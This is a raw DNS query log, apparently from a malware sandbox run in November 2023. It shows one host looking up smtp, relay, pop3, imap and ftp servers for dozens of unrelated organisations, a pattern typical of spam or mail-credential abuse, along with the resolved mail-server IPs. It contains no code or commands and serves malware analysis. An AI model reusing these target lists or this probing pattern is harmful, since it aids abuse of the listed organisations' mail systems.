                                                                                                                                                                                                    Nov 26, 2023 06:59:42.160095930 CET1.1.1.1192.168.2.40x8fc2Name error (3)relay.2l7g4s.usnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.160249949 CET1.1.1.1192.168.2.40xe13Name error (3)relay.sofia-communications.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.160300970 CET1.1.1.1192.168.2.40xb99cName error (3)smtp.lgs-strategies.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.161493063 CET1.1.1.1192.168.2.40x485aName error (3)smtp.yahoo.comfreezednonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.169919014 CET1.1.1.1192.168.2.40x10c0Name error (3)relay.kvsroraipur.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.185143948 CET1.1.1.1192.168.2.40x335fName error (3)relay.ardcrushing.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.186136007 CET1.1.1.1192.168.2.40xd6caName error (3)relay.mnit.uc.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.191613913 CET1.1.1.1192.168.2.40x2dafName error (3)smtp.kvsroraipur.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.193455935 CET1.1.1.1192.168.2.40x7c11Name error (3)smtp.carelesscommunity.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.194072962 CET1.1.1.1192.168.2.40x3790Name error (3)relay.y3.qj51acpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.194084883 CET1.1.1.1192.168.2.40x2bdeName error (3)smtp.mnit.uc.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.194588900 CET1.1.1.1192.168.2.40xb14bName error (3)smtp.ardcrushing.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.197016954 CET1.1.1.1192.168.2.40xc48dName error (3)relay.foundtoo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.199655056 CET1.1.1.1192.168.2.40x624aName error (3)smtp.dbschooldelhi.ac.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.200567007 CET1.1.1.1192.168.2.40x1af7Name error (3)relay.dbschooldelhi.ac.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.203773022 CET1.1.1.1192.168.2.40x3dcaName error (3)smtp.2l7g4s.usnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.205430031 CET1.1.1.1192.168.2.40xac65Name error (3)smtp.highstreet-re.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.207113028 CET1.1.1.1192.168.2.40x72c2Name error (3)smtp.foundtoo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.210176945 CET1.1.1.1192.168.2.40xbbc6Name error (3)smtp.gmail.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.212919950 CET1.1.1.1192.168.2.40xf74cName error (3)smtp.lwindowelive.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.212932110 CET1.1.1.1192.168.2.40xa4e7Name error (3)smtp.y3.qj51acpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.216181993 CET1.1.1.1192.168.2.40xa3b6Name error (3)smtp.xtsagency.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.217289925 CET1.1.1.1192.168.2.40x606eServer failure (2)relay.bosworthacademy.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.218856096 CET1.1.1.1192.168.2.40xea01Name error (3)relay.carelesscommunity.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.274147034 CET1.1.1.1192.168.2.40x9e2eName error (3)smtp.paintd.plus.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.274601936 CET1.1.1.1192.168.2.40x7d16Name error (3)relay.xtsagency.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.364717007 CET1.1.1.1192.168.2.40xf1d7Name error (3)relay.lwindowelive.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.399404049 CET1.1.1.1192.168.2.40x38e0Name error (3)relay.gmail.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.401163101 CET1.1.1.1192.168.2.40xceebName error (3)pop3.privatemoe.aenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.434098005 CET1.1.1.1192.168.2.40x3335Server failure (2)smtp.bosworthacademy.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.478745937 CET1.1.1.1192.168.2.40x55c2Name error (3)relay.bunasta.eunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.562786102 CET1.1.1.1192.168.2.40x35eaName error (3)mailgate.privatemoe.aenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.784218073 CET1.1.1.1192.168.2.40xba4Name error (3)smtp.member3.co.zanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.967581034 CET1.1.1.1192.168.2.40xe18eName error (3)relay.paintd.plus.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:43.078414917 CET1.1.1.1192.168.2.40xa847Name error (3)mail.cringemonster.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:43.317842960 CET1.1.1.1192.168.2.40xc236Server failure (2)relay.schmith.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:43.329541922 CET1.1.1.1192.168.2.40x2a8bName error (3)pop.cringemonster.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:43.366473913 CET1.1.1.1192.168.2.40x6ccfNo error (0)mx2.emailsrvr.com184.106.54.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:43.371706963 CET1.1.1.1192.168.2.40x5ef0Name error (3)smtp.privatemoe.aenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:43.448067904 CET1.1.1.1192.168.2.40x3dc5No error (0)mx2.supremebox.com198.23.53.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:43.448067904 CET1.1.1.1192.168.2.40x3dc5No error (0)mx2.supremebox.com198.23.53.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:43.448067904 CET1.1.1.1192.168.2.40x3dc5No error (0)mx2.supremebox.com198.23.53.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:43.536490917 CET1.1.1.1192.168.2.40x3900Name error (3)pop3.cringemonster.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:43.578278065 CET1.1.1.1192.168.2.40xa404Name error (3)relay.privatemoe.aenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:43.838386059 CET1.1.1.1192.168.2.40xd1b8Name error (3)mailgate.cringemonster.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:44.006151915 CET1.1.1.1192.168.2.40xa17aName error (3)ftp.edgewater.groupnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:44.371311903 CET1.1.1.1192.168.2.40xf179No error (0)mx01.1and1.com74.208.5.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:44.405108929 CET1.1.1.1192.168.2.40x9ca8Name error (3)relay.cringemonster.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:44.407654047 CET1.1.1.1192.168.2.40xfeb1Name error (3)ftp.rochester-gauges.benonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:44.453525066 CET1.1.1.1192.168.2.40xb683No error (0)jamiesonmullin-com.mail.protection.outlook.com104.47.75.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:44.453525066 CET1.1.1.1192.168.2.40xb683No error (0)jamiesonmullin-com.mail.protection.outlook.com104.47.75.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:44.455135107 CET1.1.1.1192.168.2.40x3eabNo error (0)krkconcord-com.mail.protection.outlook.com104.47.73.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:44.455135107 CET1.1.1.1192.168.2.40x3eabNo error (0)krkconcord-com.mail.protection.outlook.com104.47.74.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:44.556180000 CET1.1.1.1192.168.2.40x1c1aNo error (0)ftp.viidelta.com89.31.143.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:44.580454111 CET1.1.1.1192.168.2.40xf369Name error (3)imap.cringemonster.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:44.914057970 CET1.1.1.1192.168.2.40x2c75No error (0)rochestergauges-be02c.mail.protection.outlook.com104.47.73.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:44.914057970 CET1.1.1.1192.168.2.40x2c75No error (0)rochestergauges-be02c.mail.protection.outlook.com104.47.73.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:44.929502010 CET1.1.1.1192.168.2.40xa57dNo error (0)gethsemane-org.mail.protection.outlook.com104.47.73.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:44.929502010 CET1.1.1.1192.168.2.40xa57dNo error (0)gethsemane-org.mail.protection.outlook.com104.47.74.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:44.932410002 CET1.1.1.1192.168.2.40xa5a5No error (0)ibright-net.mail.protection.outlook.com104.47.55.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:44.932410002 CET1.1.1.1192.168.2.40xa5a5No error (0)ibright-net.mail.protection.outlook.com104.47.66.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:45.068451881 CET1.1.1.1192.168.2.40xe589No error (0)talentius-com.mail.protection.outlook.com104.47.17.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:45.068451881 CET1.1.1.1192.168.2.40xe589No error (0)talentius-com.mail.protection.outlook.com104.47.17.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:45.437410116 CET1.1.1.1192.168.2.40x9bfaNo error (0)my-calvary-qld-edu-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:45.437410116 CET1.1.1.1192.168.2.40x9bfaNo error (0)my-calvary-qld-edu-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:46.421611071 CET1.1.1.1192.168.2.40x1d74No error (0)mx2.jimdo.com108.166.43.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:46.711416006 CET1.1.1.1192.168.2.40xb3adNo error (0)mail.edgewater.group104.200.30.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.259361029 CET1.1.1.1192.168.2.40xa43cNo error (0)ftp.wasserman.us216.250.121.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.312685013 CET1.1.1.1192.168.2.40xde8dNo error (0)aoiit-store.mail.protection.outlook.com52.101.42.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.312685013 CET1.1.1.1192.168.2.40xde8dNo error (0)aoiit-store.mail.protection.outlook.com52.101.9.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.312685013 CET1.1.1.1192.168.2.40xde8dNo error (0)aoiit-store.mail.protection.outlook.com52.101.11.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.312685013 CET1.1.1.1192.168.2.40xde8dNo error (0)aoiit-store.mail.protection.outlook.com52.101.40.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.312685013 CET1.1.1.1192.168.2.40xde8dNo error (0)aoiit-store.mail.protection.outlook.com52.101.11.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.312685013 CET1.1.1.1192.168.2.40xde8dNo error (0)aoiit-store.mail.protection.outlook.com52.101.8.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.312685013 CET1.1.1.1192.168.2.40xde8dNo error (0)aoiit-store.mail.protection.outlook.com52.101.42.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.321336985 CET1.1.1.1192.168.2.40x36d7No error (0)jamiesonmullin-com.mail.protection.outlook.com104.47.75.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.321336985 CET1.1.1.1192.168.2.40x36d7No error (0)jamiesonmullin-com.mail.protection.outlook.com104.47.75.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.325714111 CET1.1.1.1192.168.2.40x615No error (0)krkconcord-com.mail.protection.outlook.com104.47.73.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.325714111 CET1.1.1.1192.168.2.40x615No error (0)krkconcord-com.mail.protection.outlook.com104.47.73.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.331140041 CET1.1.1.1192.168.2.40x121dNo error (0)octetpowers-in.mail.protection.outlook.com104.47.74.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.336494923 CET1.1.1.1192.168.2.40x296aNo error (0)avient-com.mail.protection.outlook.com52.101.42.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.336494923 CET1.1.1.1192.168.2.40x296aNo error (0)avient-com.mail.protection.outlook.com52.101.9.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.336494923 CET1.1.1.1192.168.2.40x296aNo error (0)avient-com.mail.protection.outlook.com52.101.11.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.336494923 CET1.1.1.1192.168.2.40x296aNo error (0)avient-com.mail.protection.outlook.com52.101.8.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.336494923 CET1.1.1.1192.168.2.40x296aNo error (0)avient-com.mail.protection.outlook.com52.101.9.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.336494923 CET1.1.1.1192.168.2.40x296aNo error (0)avient-com.mail.protection.outlook.com52.101.8.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.336494923 CET1.1.1.1192.168.2.40x296aNo error (0)avient-com.mail.protection.outlook.com52.101.9.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.372747898 CET1.1.1.1192.168.2.40x1757No error (0)gethsemane-org.mail.protection.outlook.com104.47.74.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.372747898 CET1.1.1.1192.168.2.40x1757No error (0)gethsemane-org.mail.protection.outlook.com104.47.73.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.389457941 CET1.1.1.1192.168.2.40xf32No error (0)directlendersllc-com.mail.protection.outlook.com52.101.11.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.389457941 CET1.1.1.1192.168.2.40xf32No error (0)directlendersllc-com.mail.protection.outlook.com52.101.9.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.389457941 CET1.1.1.1192.168.2.40xf32No error (0)directlendersllc-com.mail.protection.outlook.com52.101.8.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.389457941 CET1.1.1.1192.168.2.40xf32No error (0)directlendersllc-com.mail.protection.outlook.com52.101.11.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.389457941 CET1.1.1.1192.168.2.40xf32No error (0)directlendersllc-com.mail.protection.outlook.com52.101.8.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.389457941 CET1.1.1.1192.168.2.40xf32No error (0)directlendersllc-com.mail.protection.outlook.com52.101.8.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.397687912 CET1.1.1.1192.168.2.40x223No error (0)ibright-net.mail.protection.outlook.com104.47.59.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.397687912 CET1.1.1.1192.168.2.40x223No error (0)ibright-net.mail.protection.outlook.com104.47.66.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.404663086 CET1.1.1.1192.168.2.40x51b9No error (0)greenrworld-com.mail.protection.outlook.com52.101.9.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.404663086 CET1.1.1.1192.168.2.40x51b9No error (0)greenrworld-com.mail.protection.outlook.com52.101.40.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.404663086 CET1.1.1.1192.168.2.40x51b9No error (0)greenrworld-com.mail.protection.outlook.com52.101.42.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.404663086 CET1.1.1.1192.168.2.40x51b9No error (0)greenrworld-com.mail.protection.outlook.com52.101.40.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.404663086 CET1.1.1.1192.168.2.40x51b9No error (0)greenrworld-com.mail.protection.outlook.com52.101.8.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.404663086 CET1.1.1.1192.168.2.40x51b9No error (0)greenrworld-com.mail.protection.outlook.com52.101.40.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.404663086 CET1.1.1.1192.168.2.40x51b9No error (0)greenrworld-com.mail.protection.outlook.com52.101.8.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.405955076 CET1.1.1.1192.168.2.40xf794No error (0)ecolandeck-at0i.mail.protection.outlook.com52.101.73.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.405955076 CET1.1.1.1192.168.2.40xf794No error (0)ecolandeck-at0i.mail.protection.outlook.com52.101.68.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.405955076 CET1.1.1.1192.168.2.40xf794No error (0)ecolandeck-at0i.mail.protection.outlook.com52.101.68.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.405955076 CET1.1.1.1192.168.2.40xf794No error (0)ecolandeck-at0i.mail.protection.outlook.com52.101.73.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.405955076 CET1.1.1.1192.168.2.40xf794No error (0)ecolandeck-at0i.mail.protection.outlook.com52.101.73.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.405955076 CET1.1.1.1192.168.2.40xf794No error (0)ecolandeck-at0i.mail.protection.outlook.com52.101.73.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.405955076 CET1.1.1.1192.168.2.40xf794No error (0)ecolandeck-at0i.mail.protection.outlook.com52.101.73.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.406233072 CET1.1.1.1192.168.2.40x5465No error (0)rochestergauges-be02c.mail.protection.outlook.com104.47.73.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.406233072 CET1.1.1.1192.168.2.40x5465No error (0)rochestergauges-be02c.mail.protection.outlook.com104.47.73.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.407934904 CET1.1.1.1192.168.2.40x401No error (0)mx.a.locaweb.com.br186.202.4.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.411032915 CET1.1.1.1192.168.2.40x894eNo error (0)rechagricola-com-br.mail.protection.outlook.com52.101.9.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.411032915 CET1.1.1.1192.168.2.40x894eNo error (0)rechagricola-com-br.mail.protection.outlook.com52.101.9.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.411032915 CET1.1.1.1192.168.2.40x894eNo error (0)rechagricola-com-br.mail.protection.outlook.com52.101.8.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.411032915 CET1.1.1.1192.168.2.40x894eNo error (0)rechagricola-com-br.mail.protection.outlook.com52.101.8.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.411032915 CET1.1.1.1192.168.2.40x894eNo error (0)rechagricola-com-br.mail.protection.outlook.com52.101.11.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.411032915 CET1.1.1.1192.168.2.40x894eNo error (0)rechagricola-com-br.mail.protection.outlook.com52.101.40.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.411032915 CET1.1.1.1192.168.2.40x894eNo error (0)rechagricola-com-br.mail.protection.outlook.com52.101.40.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.412313938 CET1.1.1.1192.168.2.40xd79bNo error (0)mx4.mainnetmail.com165.22.206.176A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.413649082 CET1.1.1.1192.168.2.40xc03bNo error (0)gmailvz-com.mail.protection.outlook.com52.101.11.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.413649082 CET1.1.1.1192.168.2.40xc03bNo error (0)gmailvz-com.mail.protection.outlook.com52.101.40.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.413649082 CET1.1.1.1192.168.2.40xc03bNo error (0)gmailvz-com.mail.protection.outlook.com52.101.11.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.413649082 CET1.1.1.1192.168.2.40xc03bNo error (0)gmailvz-com.mail.protection.outlook.com52.101.8.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.413649082 CET1.1.1.1192.168.2.40xc03bNo error (0)gmailvz-com.mail.protection.outlook.com52.101.42.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.413649082 CET1.1.1.1192.168.2.40xc03bNo error (0)gmailvz-com.mail.protection.outlook.com52.101.42.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.413649082 CET1.1.1.1192.168.2.40xc03bNo error (0)gmailvz-com.mail.protection.outlook.com52.101.9.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.419878960 CET1.1.1.1192.168.2.40x19deNo error (0)esoft-academy.mail.eo.outlook.com52.101.137.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.419878960 CET1.1.1.1192.168.2.40x19deNo error (0)esoft-academy.mail.eo.outlook.com52.101.132.28A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.419878960 CET1.1.1.1192.168.2.40x19deNo error (0)esoft-academy.mail.eo.outlook.com52.101.137.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.419878960 CET1.1.1.1192.168.2.40x19deNo error (0)esoft-academy.mail.eo.outlook.com52.101.132.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.445213079 CET1.1.1.1192.168.2.40xa1deNo error (0)grg17geblergasse-at.mail.protection.outlook.com52.101.73.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.445213079 CET1.1.1.1192.168.2.40xa1deNo error (0)grg17geblergasse-at.mail.protection.outlook.com52.101.73.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.445213079 CET1.1.1.1192.168.2.40xa1deNo error (0)grg17geblergasse-at.mail.protection.outlook.com52.101.73.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.445213079 CET1.1.1.1192.168.2.40xa1deNo error (0)grg17geblergasse-at.mail.protection.outlook.com52.101.73.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.445213079 CET1.1.1.1192.168.2.40xa1deNo error (0)grg17geblergasse-at.mail.protection.outlook.com52.101.73.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.445213079 CET1.1.1.1192.168.2.40xa1deNo error (0)grg17geblergasse-at.mail.protection.outlook.com52.101.68.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.445213079 CET1.1.1.1192.168.2.40xa1deNo error (0)grg17geblergasse-at.mail.protection.outlook.com52.101.68.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.446877956 CET1.1.1.1192.168.2.40x8ab0No error (0)engelfirm-com01c.mail.protection.outlook.com52.101.9.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.446877956 CET1.1.1.1192.168.2.40x8ab0No error (0)engelfirm-com01c.mail.protection.outlook.com52.101.11.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.446877956 CET1.1.1.1192.168.2.40x8ab0No error (0)engelfirm-com01c.mail.protection.outlook.com52.101.40.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.446877956 CET1.1.1.1192.168.2.40x8ab0No error (0)engelfirm-com01c.mail.protection.outlook.com52.101.42.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.446877956 CET1.1.1.1192.168.2.40x8ab0No error (0)engelfirm-com01c.mail.protection.outlook.com52.101.9.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.446877956 CET1.1.1.1192.168.2.40x8ab0No error (0)engelfirm-com01c.mail.protection.outlook.com52.101.42.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.446877956 CET1.1.1.1192.168.2.40x8ab0No error (0)engelfirm-com01c.mail.protection.outlook.com52.101.8.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.452420950 CET1.1.1.1192.168.2.40x9508No error (0)chandigarhuniversityazure.mail.protection.outlook.com52.101.42.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.452420950 CET1.1.1.1192.168.2.40x9508No error (0)chandigarhuniversityazure.mail.protection.outlook.com52.101.9.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.452420950 CET1.1.1.1192.168.2.40x9508No error (0)chandigarhuniversityazure.mail.protection.outlook.com52.101.42.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.452420950 CET1.1.1.1192.168.2.40x9508No error (0)chandigarhuniversityazure.mail.protection.outlook.com52.101.8.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.452420950 CET1.1.1.1192.168.2.40x9508No error (0)chandigarhuniversityazure.mail.protection.outlook.com52.101.9.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.452420950 CET1.1.1.1192.168.2.40x9508No error (0)chandigarhuniversityazure.mail.protection.outlook.com52.101.8.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:58.463231087 CET1.1.1.1192.168.2.40xf38dNo error (0)ceuandalucia-es.mail.protection.outlook.com52.101.73.6A (IP address)IN (0x0001)false
